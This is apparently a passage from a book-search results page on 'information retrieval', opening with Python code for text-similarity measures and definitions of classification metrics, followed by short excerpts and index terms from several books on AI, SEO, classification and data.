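    a, b = set(a), set(b)
    return 1 - len(a & b) / len(a | b)

# Document A from the text; document B's counts are invented.
doc_a = {"performance": 7, "transition": 3, "monetary": 2}
doc_b = {"performance": 2, "transition": 1, "fiscal": 4}
print(round(cosine_similarity(doc_a, doc_b), 3))  # → 0.471
print(jaccard_distance(doc_a, doc_b))             # → 0.5 (dicts treated as word sets)
```

Cosine distance, as defined in the text, is then simply 1 minus the cosine similarity.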

True positive rate and False negative rate refer to the frequency of being correct and incorrect, respectively, when the instance is actually positive: TP/(TP + FN) and FN/(TP + FN). The True negative rate and False positive rate are analogous for the instances that are actually negative. These are often taken as estimates of the probability of predicting Y when the instance is actually p, that is p(Y|p), etc. We will continue to explore these measures in Chapter 8. The metrics Precision and Recall are often used, especially in text classification and information retrieval. Recall is the same as true positive rate, while precision is TP/(TP + FP), which is the accuracy over the cases predicted to be positive. The F-measure is the harmonic mean of precision and recall at a given point, and is: Practitioners in many fields such as statistics, pattern recognition, and epidemiology speak of the sensitivity and specificity of a classifier: You may also hear about the positive predictive value, which is the same as precision.
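The rates and the F-measure defined above follow directly from the four confusion-matrix counts. A minimal sketch, with the counts themselves invented for illustration:

```python
def classification_metrics(tp, fp, tn, fn):
    """Rates from confusion-matrix counts, as defined in the text."""
    precision = tp / (tp + fp)  # a.k.a. positive predictive value
    recall = tp / (tp + fn)     # a.k.a. true positive rate, sensitivity
    return {
        "true_positive_rate": recall,
        "false_negative_rate": fn / (tp + fn),
        "true_negative_rate": tn / (tn + fp),  # a.k.a. specificity
        "false_positive_rate": fp / (tn + fp),
        "precision": precision,
        "recall": recall,
        # F-measure: harmonic mean of precision and recall
        "f_measure": 2 * precision * recall / (precision + recall),
    }

# Invented counts for illustration.
m = classification_metrics(tp=60, fp=20, tn=100, fn=20)
print(m["precision"], m["recall"], m["f_measure"])  # → 0.75 0.75 0.75
```

Note that the positive-class rates divide by (TP + FN), the negative-class rates by (TN + FP), while precision alone divides by the predicted positives (TP + FP).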


pages: 413 words: 119,587

Machines of Loving Grace: The Quest for Common Ground Between Humans and Robots by John Markoff

"Robert Solow", A Declaration of the Independence of Cyberspace, AI winter, airport security, Apple II, artificial general intelligence, Asilomar, augmented reality, autonomous vehicles, basic income, Baxter: Rethink Robotics, Bill Duvall, bioinformatics, Brewster Kahle, Burning Man, call centre, cellular automata, Chris Urmson, Claude Shannon: information theory, Clayton Christensen, clean water, cloud computing, collective bargaining, computer age, computer vision, crowdsourcing, Danny Hillis, DARPA: Urban Challenge, data acquisition, Dean Kamen, deskilling, don't be evil, Douglas Engelbart, Douglas Engelbart, Douglas Hofstadter, Dynabook, Edward Snowden, Elon Musk, Erik Brynjolfsson, factory automation, From Mathematics to the Technologies of Life and Death, future of work, Galaxy Zoo, Google Glasses, Google X / Alphabet X, Grace Hopper, Gunnar Myrdal, Gödel, Escher, Bach, Hacker Ethic, haute couture, hive mind, hypertext link, indoor plumbing, industrial robot, information retrieval, Internet Archive, Internet of things, invention of the wheel, Jacques de Vaucanson, Jaron Lanier, Jeff Bezos, job automation, John Conway, John Markoff, John Maynard Keynes: Economic Possibilities for our Grandchildren, John Maynard Keynes: technological unemployment, John von Neumann, Kevin Kelly, knowledge worker, Kodak vs Instagram, labor-force participation, loose coupling, Marc Andreessen, Mark Zuckerberg, Marshall McLuhan, medical residency, Menlo Park, Mitch Kapor, Mother of all demos, natural language processing, new economy, Norbert Wiener, PageRank, pattern recognition, pre–internet, RAND corporation, Ray Kurzweil, Richard Stallman, Robert Gordon, Rodney Brooks, Sand Hill Road, Second Machine Age, self-driving car, semantic web, shareholder value, side project, Silicon Valley, Silicon Valley startup, Singularitarianism, skunkworks, Skype, social software, speech recognition, stealth mode startup, Stephen Hawking, Steve Ballmer, Steve Jobs, Steve Wozniak, Steven Levy, 
Stewart Brand, strong AI, superintelligent machines, technological singularity, Ted Nelson, telemarketer, telepresence, telepresence robot, Tenerife airport disaster, The Coming Technological Singularity, the medium is the message, Thorstein Veblen, Turing test, Vannevar Bush, Vernor Vinge, Watson beat the top human players on Jeopardy!, Whole Earth Catalog, William Shockley: the traitorous eight, zero-sum game

Engelbart’s researchers, an eclectic collection of buttoned-down white-shirted engineers and long-haired computer hackers, were taking computing in a direction so different it was not even in the same coordinate system. The Shakey project was struggling to mimic the human mind and body. Engelbart had a very different goal. During World War II he had stumbled across an article by Vannevar Bush, who had proposed a microfiche-based information retrieval system called Memex to manage all of the world’s knowledge. Engelbart later decided that such a system could be assembled based on the then newly available computers. He thought the time was right to build an interactive system to capture knowledge and organize information in such a way that it would now be possible for a small group of people—scientists, engineers, educators—to create and collaborate more effectively.

In one sense the company began as the quintessential intelligence augmentation, or IA, company. The PageRank algorithm Larry Page developed to improve Internet search results essentially mined human intelligence by using the crowd-sourced accumulation of human decisions about valuable information sources. Google initially began by collecting and organizing human knowledge and then making it available to humans as part of a glorified Memex, the original global information retrieval system first proposed by Vannevar Bush in the Atlantic Monthly in 1945.11 As the company has evolved, however, it has started to push heavily toward systems that replace rather than extend humans. Google’s executives have obviously thought to some degree about the societal consequences of the systems they are creating. Their corporate motto remains “Don’t be evil.” Of course, that is nebulous enough to be construed to mean almost anything.

A student in computer science first at the State University of New York at Buffalo, he then entered graduate programs in computer science at both Washington University in St. Louis and Stanford, but dropped out of both programs before receiving an advanced degree. Once he was on the West Coast, he had gotten involved with Brewster Kahle’s Internet Archive Project, which sought to save a copy of every Web page on the Internet. Larry Page and Sergey Brin had given Hassan stock for programming PageRank, and Hassan also sold E-Groups, another of his information retrieval projects, to Yahoo! for almost a half-billion dollars. By then, he was a very wealthy Silicon Valley technologist looking for interesting projects. In 2006 he backed both Ng and Salisbury and hired Salisbury’s students to join Willow Garage, a laboratory he’d already created to facilitate the next generation of robotics technology—like designing driverless cars. Hassan believed that building a home robot was a more marketable and achievable goal, so he set Willow Garage to work designing a PR2 robot to develop technology that he could ultimately introduce into more commercial projects.


The Art of SEO by Eric Enge, Stephan Spencer, Jessie Stricchiola, Rand Fishkin

AltaVista, barriers to entry, bounce rate, Build a better mousetrap, business intelligence, cloud computing, dark matter, en.wikipedia.org, Firefox, Google Chrome, Google Earth, hypertext link, index card, information retrieval, Internet Archive, Law of Accelerating Returns, linked data, mass immigration, Metcalfe’s law, Network effects, optical character recognition, PageRank, performance metric, risk tolerance, search engine result page, self-driving car, sentiment analysis, social web, sorting algorithm, speech recognition, Steven Levy, text mining, web application, wikimedia commons

However, the search engines recognize an iframe or a frame used to pull in another site’s content for what it is, and therefore ignore the content inside the iframe or frame as it is content published by another publisher. In other words, they don’t consider content pulled in from another site as part of the unique content of your web page. Determining Searcher Intent and Delivering Relevant, Fresh Content Modern commercial search engines rely on the science of information retrieval (IR). This science has existed since the middle of the twentieth century, when retrieval systems powered computers in libraries, research facilities, and government labs. Early in the development of search systems, IR scientists realized that two critical components comprised the majority of search functionality: relevance and importance (which we defined earlier in this chapter). To measure these factors, search engines perform document analysis (including semantic analysis of concepts across documents) and link (or citation) analysis.

As far as the search engines are concerned, however, the text in a document—and particularly the frequency with which a particular term or phrase is used—has very little impact on how happy a searcher will be with that page. In fact, quite often a page laden with repetitive keywords in an attempt to please the engines will provide a very poor user experience; thus, although some SEO professionals today do claim to use term weight (a mathematical equation grounded in the real science of information retrieval) or other, more “modern” keyword text usage methods, nearly all optimization can be done very simply. The best way to ensure that you’ve achieved the greatest level of targeting in your text for a particular term or phrase is to use it in the title tag, in one or more of the section headings (within reason), and in the copy on the web page. Equally important is to use other related phrases within the body copy to reinforce the context and the relevance of your main phrase to the page.

Hiding content inside images isn’t generally advisable, though, as it can be impractical for alternative devices (mobile devices, in particular) and inaccessible to others (such as screen readers). Hiding text in Java applets As with text in images, the search engines cannot easily parse content inside Java applets. Using them as a tool to hide text would certainly be a strange choice, though. Forcing form submission Search engines will not submit HTML forms in an attempt to access the information retrieved from a search or submission. Thus, if you keep content behind a forced-form submission and never link to it externally, your content will remain out of the engines’ indexes (as Figure 6-43 demonstrates). Figure 6-43. Content that can only be accessed by submitting a form is unreadable by crawlers The problem comes when content behind forms earns links outside your control, as when bloggers, journalists, or researchers decide to link to the pages in your archives without your knowledge.


pages: 347 words: 97,721

Only Humans Need Apply: Winners and Losers in the Age of Smart Machines by Thomas H. Davenport, Julia Kirby

AI winter, Andy Kessler, artificial general intelligence, asset allocation, Automated Insights, autonomous vehicles, basic income, Baxter: Rethink Robotics, business intelligence, business process, call centre, carbon-based life, Clayton Christensen, clockwork universe, commoditize, conceptual framework, dark matter, David Brooks, deliberate practice, deskilling, digital map, disruptive innovation, Douglas Engelbart, Edward Lloyd's coffeehouse, Elon Musk, Erik Brynjolfsson, estate planning, fixed income, follow your passion, Frank Levy and Richard Murnane: The New Division of Labor, Freestyle chess, game design, general-purpose programming language, global pandemic, Google Glasses, Hans Lippershey, haute cuisine, income inequality, index fund, industrial robot, information retrieval, intermodal, Internet of things, inventory management, Isaac Newton, job automation, John Markoff, John Maynard Keynes: Economic Possibilities for our Grandchildren, John Maynard Keynes: technological unemployment, Joi Ito, Khan Academy, knowledge worker, labor-force participation, lifelogging, longitudinal study, loss aversion, Mark Zuckerberg, Narrative Science, natural language processing, Norbert Wiener, nuclear winter, pattern recognition, performance metric, Peter Thiel, precariat, quantitative trading / quantitative finance, Ray Kurzweil, Richard Feynman, risk tolerance, Robert Shiller, Robert Shiller, Rodney Brooks, Second Machine Age, self-driving car, Silicon Valley, six sigma, Skype, social intelligence, speech recognition, spinning jenny, statistical model, Stephen Hawking, Steve Jobs, Steve Wozniak, strong AI, superintelligent machines, supply-chain management, transaction costs, Tyler Cowen: Great Stagnation, Watson beat the top human players on Jeopardy!, Works Progress Administration, Zipcar

When a machine greatly augments your powers of information retrieval, as many information systems do, we would call that gaining a superpower. Indeed, in the Terminator film franchise, out of all the superhuman capabilities Skynet designed into its “cybernetic organisms,” the one filmgoers covet most is the instant pop-up retrieval of biographical information on any humans encountered. It was the inspiration, for example, for Google Glass, according to the technical lead on that product, Thad Starner.6 (And although we had to say Hasta la vista, baby, to that particular product, Google assures us it will be back.) When Tom wrote a book about knowledge workers a decade ago, there were already some examples of how empowering such information retrieval can be for them. He wrote in some detail, for example, about the idea of “computer-aided physician order entry,” particularly focusing on an example of this type of system at Partners HealthCare, a care network in Boston.

See also augmentation; specific professions augmentation and, 31–32, 62, 65, 74, 76, 100, 122, 139, 176, 185, 228, 234, 251 big-picture perspective and, 100 codified tasks and automation, 12–13, 14, 16–18, 19, 27–28, 30, 70, 139, 156, 167, 191, 204, 216, 246 creativity and, 120–21 defined, 5 demand peak, 6 deskilling and, 16 five options for, 76–77, 218, 232 (see also specific steps) how job loss happens, 23–24 information retrieval and, 65–66 lack of wage growth, 24 machine encroachment, 13, 24–25 political strategy to help, 239 roles better done by humans, 26–30 signs of coming automation, 19–22 Stepping In, post-automation work, 30–32 taking charge of destiny, 8–9 time frame for dislocation of, 24–26 who they are, 5–6 working hours of, 70 Kraft, Robert, 172–73 Krans, Mike, 102–3, 132, 134–35, 138 Kurup, Deepika, 164 Kurzweil, Ray, 36 labor unions, 1, 16, 25 Lacerte, 22 language recognition technologies, 39–40, 43, 44–45, 50, 53, 56, 212 natural language processing (NLP), 34, 37, 178 Lawton, Jim, 50, 182–83, 193 Learning by Doing (Bessen), 133, 233 legal field augmentation as leverage in, 68 automation (e-discovery), 13, 142–44, 145, 151 content analysis and automation, 20 narrow specializations, 159–60, 162 number of U.S. lawyers, 68 Stepping Up in, 93 Leibniz Institute for Astrophysics, 59 Levasseur, M.


pages: 331 words: 60,536

The Sovereign Individual: How to Survive and Thrive During the Collapse of the Welfare State by James Dale Davidson, Rees Mogg

affirmative action, agricultural Revolution, bank run, barriers to entry, Berlin Wall, borderless world, British Empire, California gold rush, clean water, colonial rule, Columbine, compound rate of return, creative destruction, Danny Hillis, debt deflation, ending welfare as we know it, epigenetics, Fall of the Berlin Wall, falling living standards, feminist movement, financial independence, Francis Fukuyama: the end of history, full employment, George Gilder, Hernando de Soto, illegal immigration, income inequality, informal economy, information retrieval, Isaac Newton, Kevin Kelly, market clearing, Martin Wolf, Menlo Park, money: store of value / unit of account / medium of exchange, new economy, New Urbanism, Norman Macrae, offshore financial centre, Parkinson's law, pattern recognition, phenotype, price mechanism, profit maximization, rent-seeking, reserve currency, road to serfdom, Ronald Coase, Sam Peltzman, school vouchers, seigniorage, Silicon Valley, spice trade, statistical model, telepresence, The Nature of the Firm, the scientific method, The Wealth of Nations by Adam Smith, Thomas L Friedman, Thomas Malthus, trade route, transaction costs, Turing machine, union organizing, very high income, Vilfredo Pareto

They may perform the whole operation from another jurisdiction where taxes are lower and courts do not honor exorbitant malpractice claims. Digital Lawyers Before agreeing to perform an operation, the skilled surgeon will probably call upon a digital lawyer to draft an instant contract that specifies and limits liability based upon the size and characteristics of the tumor revealed in images displayed by the magnetic resonance machine. Digital lawyers will be information-retrieval systems that automate selection of contract provisions, employing artificial intelligence processes such as neural networks to customize private contracts to meet transnational legal conditions. Participants in most high-value or important transactions will not only shop for suitable partners with whom to conduct business; they will also shop for a suitable domicile for their transactions.

Lifetime employment will disappear as "jobs" increasingly become tasks or "piece work" rather than positions within an organization. Control over economic resources will shift away from the state to persons of superior skills and intelligence, as it becomes increasingly easy to create wealth by adding knowledge to products. Many members of learned professions will be displaced by interactive information-retrieval systems. New survival strategies for persons of lower intelligence will evolve, involving greater concentration on development of leisure skills, sports abilities, and crime, as well as service to the growing numbers of Sovereign Individuals as income inequality within jurisdictions rises. Political systems that grew up at a time when there were rising returns to violence must undergo wrenching adjustments.

Rapidly changing technology is undermining the megapolitical basis of social and economic organization. As a consequence, broad paradigmatic understanding, or unspoken theories about the way the world works, are being antiquated more quickly than in the past. This increases the importance of the broad overview and diminishes the value of individual "facts" of the kind that are readily available to almost anyone with an information retrieval system. 3. The growing tribalization and marginalization of life have had a stunting effect on discourse, and even on thinking. Many people have consequently gotten into the habit of shying away from conclusions that are obviously implied by the facts at their disposal. A recent psychological study disguised as a public opinion poll showed that members of individual occupational groups were almost uniformly unwilling to accept any conclusion that implied a loss of income for them, no matter how airtight the logic supporting it.


Sorting Things Out: Classification and Its Consequences (Inside Technology) by Geoffrey C. Bowker

affirmative action, business process, corporate governance, Drosophila, information retrieval, loose coupling, Menlo Park, Mitch Kapor, natural language processing, Occam's razor, QWERTY keyboard, Scientific racism, scientific worldview, sexual politics, statistical model, Stephen Hawking, Stewart Brand, the built environment, the medium is the message, transaction costs, William of Occam

So one culture sees spirit possession as a valid cause of death, another ridicules this as superstition; one medical specialty sees cancer as a localized phenomenon to be cut out and stopped from spreading, another sees it as a disorder of the whole immune system that merely manifests in one location or another. The implications for both treatment and classification differ. Trying to encode both causes results in serious information retrieval problems. In addition, classifications shift historically. In Britain in 1650 we find that 696 people died of being "aged"; 31 succumbed to wolves, 9 to grief, and 19 to "King's Evil." "Mother" claimed 2 in 1647 but none in 1650, but in that year 2 were "smothered and stifled" (see figure 1.3). Seven starved in 1650 (Graunt 1662), but by 1950 the WHO would make a distinction: if an adult starved to death it was a misfortune; if a child starved, it was homicide.

) indexicality: the 48 points were only recognized if they were at least 0.5 cun from a classic acupuncture point, where a cun is: "the distance between the interphalangeal creases of the patient's middle finger" (WHO 1991, 14). Formal Classification The structural aspects of classification are themselves a technical specialty in information science, biology, and statistics, among other places. Information scientists design thesauri for information retrieval, valuing parsimony and accuracy of terms, and the overall stability of the system over long periods of time. For biologists the choice of structure reflects how one sees species and the evolutionary process. For transformed cladists and numerical taxonomists, no useful statement about the past can be read out of their classifications; for evolutionary taxonomists that is the very basis of their system.

Each time another developer describes yet another formalism for encoding medical knowledge, the number of incompatibilities among these different systems increases exponentially. (Musen 1992, 435) He points out that there is no clear relationship between "the Unified Medical Language System [UMLS] advanced by the National Library of Medicine and the Arden syntax proposed by the American Society for Testing and Materials as a standard for representing medical knowledge" (Musen 1992, 436). The ICD, he points out, originated as a means for describing causes of death; a trace of its heritage is its continued difficulty with describing chronic as opposed to acute forms of disease. This is one basis for the temporal fault lines that emerge in its usage. The UMLS originated as a means of information retrieval (the MeSH scheme) and is not as sensitive to clinical conditions as it might be (Musen 1992, 440). The two basic problems for any overarching classification scheme in a rapidly changing and complex field can be described as follows. First, any classificatory decision made now might by its nature block off valuable future developments. If we decide that all instances of sudden infant death syndrome (SIDS) are to be placed into a single box (R95 in ICD-10), then we are not recording information that might be used by future researchers to distinguish possible multiple social or environmental causes of SIDS.


pages: 32 words: 7,759

8 Day Trips From London by Dee Maldon

Doomsday Book, information retrieval, Isaac Newton, Stephen Hawking, the market place

8 Day Trips from London A simple guide for visitors who want to see more than the capital By Dee Maldon Bookline & Thinker Ltd Bookline & Thinker Ltd #231, 405 King’s Road London SW10 OBB www.booklinethinker.com Eight Days Out From London Copyright © Bookline & Thinker Ltd 2010 This book is a work of non-fiction A CIP catalogue record for this book is available from the British Library All rights reserved. No part of this work may be reproduced or stored in an information retrieval system without the express permission of the publisher ISBN: 9780956517715 Printed and bound by Lightning Source UK Book cover designed by Donald McColl Contents Bath Brighton Cambridge Canterbury Oxford Stonehenge Winchester Windsor Introduction Why take any day trips from London? After all London has so much to see and do. Who could ever be bored there? But escaping London is not about being bored.


pages: 379 words: 109,612

Is the Internet Changing the Way You Think?: The Net's Impact on Our Minds and Future by John Brockman

A Declaration of the Independence of Cyberspace, Albert Einstein, AltaVista, Amazon Mechanical Turk, Asperger Syndrome, availability heuristic, Benoit Mandelbrot, biofilm, Black Swan, British Empire, conceptual framework, corporate governance, Danny Hillis, Douglas Engelbart, Emanuel Derman, epigenetics, Flynn Effect, Frank Gehry, Google Earth, hive mind, Howard Rheingold, index card, information retrieval, Internet Archive, invention of writing, Jane Jacobs, Jaron Lanier, John Markoff, Kevin Kelly, lifelogging, lone genius, loss aversion, mandelbrot fractal, Marc Andreessen, Marshall McLuhan, Menlo Park, meta-analysis, New Journalism, Nicholas Carr, out of africa, Paul Samuelson, peer-to-peer, Ponzi scheme, pre–internet, Richard Feynman, Rodney Brooks, Ronald Reagan, Schrödinger's Cat, Search for Extraterrestrial Intelligence, SETI@home, Silicon Valley, Skype, slashdot, smart grid, social graph, social software, social web, Stephen Hawking, Steve Wozniak, Steven Pinker, Stewart Brand, Ted Nelson, telepresence, the medium is the message, the scientific method, The Wealth of Nations by Adam Smith, theory of mind, trade route, upwardly mobile, Vernor Vinge, Whole Earth Catalog, X Prize

And when a file becomes corrupt, all I am left with is a pointer, a void where an idea should be, the ghost of a departed thought. The New Balance: More Processing, Less Memorization Fiery Cushman Postdoctoral fellow, Mind/Brain/Behavior Interfaculty Initiative, Harvard University The Internet changes the way I behave, and possibly the way I think, by reducing the processing costs of information retrieval. I focus more on knowing how to obtain and use information online and less on memorizing it. This tradeoff between processing and memory reminds me of one of my father’s favorite stories, perhaps apocryphal, about studying the periodic table of the elements in his high school chemistry class. On their test, the students were given a blank table and asked to fill in names and atomic weights.

I look up recipes after I arrive at the supermarket. And when a friend cooks a good meal, I’m more interested to learn what Website it came from than how it was spiced. I don’t know most of the American Psychological Association rules for style and citation, but my computer does. For any particular “computation” I perform, I don’t need the same depth of knowledge, because I have access to profoundly more efficient processes of information retrieval. So the Internet clearly changes the way I behave. It must be changing the way I think at some level, insofar as my behavior is a product of my thoughts. It probably is not changing the basic kinds of mental processes I can perform but it might be changing their relative weighting. We psychologists love to impress undergraduates with the fact that taxi drivers have unusually large hippocampi.

Anthony Aguirre Associate professor of physics, University of California, Santa Cruz Recently I wanted to learn about twelfth-century China—not a deep or scholarly understanding, just enough to add a bit of not-wrong color to something I was writing. Wikipedia was perfect! More regularly, my astrophysics and cosmology endeavors bring me to databases such as arXiv, ADS (Astrophysics Data System), and SPIRES (Stanford Physics Information Retrieval System), which give instant and organized access to all the articles and information I might need to research and write. Between such uses and an appreciable fraction of my time spent processing e-mails, I, like most of my colleagues, spend a lot of time connected to the Internet. It is a central tool in my research life. Yet what I do that is most valuable—to me, at least—is the occasional generation of genuine creative insights.


pages: 58 words: 12,386

Big Data Glossary by Pete Warden

business intelligence, crowdsourcing, fault tolerance, information retrieval, linked data, natural language processing, recommendation engine, web application

As a user, you select elements on an example page that contain the data you’re interested in, and the tool then uses the patterns you’ve defined to pull out information from other pages on a site with a similar structure. For example, you might want to extract product names and prices from a shopping site. With the tool, you could find a single product page, select the product name and price, and then the same elements would be pulled for every other page it crawled from the site. It relies on the fact that most web pages are generated by combining templates with information retrieved from a database, and so have a very consistent structure. Once you’ve gathered the data, it offers some features that are a bit like Google Refine’s for de-duplicating and cleaning up the data. All in all, it’s a very powerful tool for turning web content into structured information, with a very approachable interface. ScraperWiki ScraperWiki is a hosted environment for writing automated processes to scan public websites and extract structured information from the pages they’ve published.
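The template-extraction idea described above can be sketched in a few lines: because template-generated pages share a consistent structure, the same element pattern (here, a `class` attribute) pulls the corresponding field from every page. The HTML snippets and field names below are invented for illustration, and a real tool would use a full selector engine rather than this minimal parser.

```python
from html.parser import HTMLParser

# Two product pages generated from the same template (invented examples).
PAGES = [
    '<div><h1 class="name">Blue Kettle</h1><span class="price">$24.99</span></div>',
    '<div><h1 class="name">Red Toaster</h1><span class="price">$39.50</span></div>',
]

class FieldExtractor(HTMLParser):
    """Collect the text of every element whose class names a target field."""
    def __init__(self, fields):
        super().__init__()
        self.fields = fields   # e.g. {"name", "price"}
        self.current = None    # field currently being read
        self.result = {}

    def handle_starttag(self, tag, attrs):
        cls = dict(attrs).get("class")
        if cls in self.fields:
            self.current = cls

    def handle_data(self, data):
        if self.current:
            self.result[self.current] = data.strip()
            self.current = None

def extract(page, fields=("name", "price")):
    parser = FieldExtractor(set(fields))
    parser.feed(page)
    return parser.result

for page in PAGES:
    print(extract(page))  # e.g. {'name': 'Blue Kettle', 'price': '$24.99'}
```

Defining the pattern once against a single example page and then applying it to every crawled page is exactly the workflow the tool described above automates.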


pages: 586 words: 186,548

Architects of Intelligence by Martin Ford

3D printing, agricultural Revolution, AI winter, Apple II, artificial general intelligence, Asilomar, augmented reality, autonomous vehicles, barriers to entry, basic income, Baxter: Rethink Robotics, Bayesian statistics, bitcoin, business intelligence, business process, call centre, cloud computing, cognitive bias, Colonization of Mars, computer vision, correlation does not imply causation, crowdsourcing, DARPA: Urban Challenge, deskilling, disruptive innovation, Donald Trump, Douglas Hofstadter, Elon Musk, Erik Brynjolfsson, Ernest Rutherford, Fellow of the Royal Society, Flash crash, future of work, gig economy, Google X / Alphabet X, Gödel, Escher, Bach, Hans Rosling, ImageNet competition, income inequality, industrial robot, information retrieval, job automation, John von Neumann, Law of Accelerating Returns, life extension, Loebner Prize, Mark Zuckerberg, Mars Rover, means of production, Mitch Kapor, natural language processing, new economy, optical character recognition, pattern recognition, phenotype, Productivity paradox, Ray Kurzweil, recommendation engine, Robert Gordon, Rodney Brooks, Sam Altman, self-driving car, sensor fusion, sentiment analysis, Silicon Valley, smart cities, social intelligence, speech recognition, statistical model, stealth mode startup, stem cell, Stephen Hawking, Steve Jobs, Steve Wozniak, Steven Pinker, strong AI, superintelligent machines, Ted Kaczynski, The Rise and Fall of American Growth, theory of mind, Thomas Bayes, Travis Kalanick, Turing test, universal basic income, Wall-E, Watson beat the top human players on Jeopardy!, women in the workforce, working-age population, zero-sum game, Zipcar

From 1996 to 1999, he worked for Digital Equipment Corporation’s Western Research Lab in Palo Alto, where he worked on low-overhead profiling tools, design of profiling hardware for out-of-order microprocessors, and web-based information retrieval. From 1990 to 1991, Jeff worked for the World Health Organization’s Global Programme on AIDS, developing software to do statistical modeling, forecasting, and analysis of the HIV pandemic. In 2009, Jeff was elected to the National Academy of Engineering, and he was also named a Fellow of the Association for Computing Machinery (ACM) and a Fellow of the American Association for the Advancement of Sciences (AAAS). His areas of interest include large-scale distributed systems, performance monitoring, compression techniques, information retrieval, application of machine learning to search and other related problems, microprocessor architecture, compiler optimizations, and development of new products that organize existing information in new and interesting ways.

That made me start thinking about AI again. I eventually figured out that the reason Watson won is because it was actually a narrower AI problem than it first appeared to be. That’s almost always the answer. In Watson’s case it’s because about 95% of the answers in Jeopardy! turn out to be the titles of Wikipedia pages. Instead of understanding language, reasoning about it and so forth, it was mostly doing information retrieval from a restricted set, namely the pages that are Wikipedia titles. It was actually not as hard of a problem as it looked like to the untutored eye, but it was interesting enough that it got me to think about AI again. Around the same time, I started writing for The New Yorker, where I was producing a lot of pieces about neuroscience, linguistics, psychology, and also AI. In my pieces, I was trying to use what I knew about cognitive science and everything around that—how the mind and language work, how children’s minds develop, etc.

MARTIN FORD: Of course, that’s not a problem that’s exclusive to AI; humans are subject to the same issues when confronted with flawed data. It’s a bias in the data that results from past decisions that people doing research made. BARBARA GROSZ: Right, but now look what’s going on in some areas of medicine. The computer system can “read all the papers” (more than a person could) and do certain kinds of information retrieval from them and extract results, and then do statistical analyses. But if most of the papers are on scientific work that was done only on male mice, or only on male humans, then the conclusions the system is coming to are limited. We’re also seeing this problem in the legal realm, with policing and fairness. So, as we build these systems, we have to think, “OK. What about how my data can be used?”


pages: 259 words: 73,193

The End of Absence: Reclaiming What We've Lost in a World of Constant Connection by Michael Harris

4chan, Albert Einstein, AltaVista, Andrew Keen, augmented reality, Burning Man, Carrington event, cognitive dissonance, crowdsourcing, dematerialisation, en.wikipedia.org, Filter Bubble, Firefox, Google Glasses, informal economy, information retrieval, invention of movable type, invention of the printing press, invisible hand, James Watt: steam engine, Jaron Lanier, jimmy wales, Kevin Kelly, lifelogging, Loebner Prize, low earth orbit, Marshall McLuhan, McMansion, moral panic, Nicholas Carr, pattern recognition, pre–internet, Republic of Letters, Silicon Valley, Skype, Snapchat, social web, Steve Jobs, the medium is the message, The Wisdom of Crowds, Turing test

Others argue that future generations will learn to make new connections with facts that aren’t held in their heads, that dematerialized knowledge can still lead to innovation. As we inevitably off-load media content to the cloud—storing our books, our television programs, our videos of the trip to Taiwan, and photos of Grandma’s ninetieth birthday, all on a nameless server—can we happily dematerialize our mind’s stores, too? Perhaps we should side with philosopher Lewis Mumford, who insisted in The Myth of the Machine that “information retrieving,” however expedient, is simply no substitute for the possession of knowledge accrued through personal and direct labor. Author Clive Thompson wondered about this when he came across recent research suggesting that we remember fewer and fewer facts these days—of three thousand people polled by neuroscientist Ian Robertson, the young were less able to recall basic personal information (a full one-third, for example, didn’t know their own phone numbers).

., 92 Franklin, Benjamin, 192 friends, 30–31 Frind, Markus, 182–83 Furbies, 29–30 Füssel, Stephan, 103 Gaddam, Sai, 173 Gallup, 123 genes, 41–43 Gentile, Douglas, 118–21 German Ideology, The (Marx), 12n Gleick, James, 137 Globe and Mail, 81–82, 89 glossary, 211–16 Google, 3, 8, 18–19, 24, 33, 43, 49, 82, 96, 142, 185 memory and, 143–47 search results on, 85–86, 91 Google AdSense, 85 Google Books, 102–3 Google Glass, 99–100 Google Maps, 91 Google Plus, 31 Gopnik, Alison, 33–34 Gould, Glenn, 200–201, 204 GPS, 35, 59, 68, 171 Greenfield, Susan, 20, 25 Grindr, 165, 167, 171, 173–74, 176 Guardian, 66n Gutenberg, Johannes, 11–13, 14, 16, 21, 34, 98 Gutenberg Bible, 83, 103 Gutenberg Galaxy, The (McLuhan), 179, 201 Gutenberg Revolution, The (Man), 12n, 103 GuySpy, 171, 172, 173 Hangul, 12n Harari, Haim, 141 Harry Potter series, 66n Hazlehurst, Ronnie, 74 Heilman, James, 75–79 Henry, William A., III, 84–85 “He Poos Clouds” (Pallett), 164 History of Reading, A (Manguel), 16, 117, 159 Hollinghurst, Alan, 115 Holmes, Sherlock, 147–48 House at Pooh Corner, The (Milne), 93 Hugo, Victor, 20–21 “Idea of North, The” (Gould), 200–201 In Defense of Elitism (Henry), 84–85 Information, The (Gleick), 137 information retrieval, 141–42 Innis, Harold, 202 In Search of Lost Time (Proust), 160 Instagram, 19, 104, 149 Internet, 19, 20, 21, 23, 26–27, 55, 69, 125, 126, 129, 141, 143, 145, 146, 187, 199, 205 brain and, 37–38, 40, 142, 185 going without, 185, 186, 189–97, 200, 208–9 remembering life before, 7–8, 15–16, 21–22, 48, 55, 203 Internship, The, 89 iPad, 21, 31 children and, 26–27, 45 iPhone, see phones iPotty, 26 iTunes, 89 Jobs, Steve, 134 Jones, Patrick, 152n Justification of Johann Gutenberg, The (Morrison), 12 Kaiser Foundation, 27, 28n Kandel, Eric, 154 Kaufman, Charlie, 155 Keen, Andrew, 88 Kelly, Kevin, 43 Kierkegaard, Søren, 49 Kinsey, Alfred, 173 knowledge, 11–12, 75, 80, 82, 83, 86, 92, 94, 98, 141, 145–46 Google Books and, 102–3 Wikipedia and, 63, 78 Koller, Daphne, 95 
Kranzberg, Melvin, 7 Kundera, Milan, 184 Lanier, Jaron, 85, 106–7, 189 latent Dirichlet allocation (LDA), 64–65 Leonardo da Vinci, 56 Lewis, R.


Beautiful Data: The Stories Behind Elegant Data Solutions by Toby Segaran, Jeff Hammerbacher

23andMe, airport security, Amazon Mechanical Turk, bioinformatics, Black Swan, business intelligence, card file, cloud computing, computer vision, correlation coefficient, correlation does not imply causation, crowdsourcing, Daniel Kahneman / Amos Tversky, DARPA: Urban Challenge, data acquisition, database schema, double helix, en.wikipedia.org, epigenetics, fault tolerance, Firefox, Hans Rosling, housing crisis, information retrieval, lake wobegon effect, longitudinal study, Mars Rover, natural language processing, openstreetmap, prediction markets, profit motive, semantic web, sentiment analysis, Simon Singh, social graph, SPARQL, speech recognition, statistical model, supply-chain management, text mining, Vernor Vinge, web application

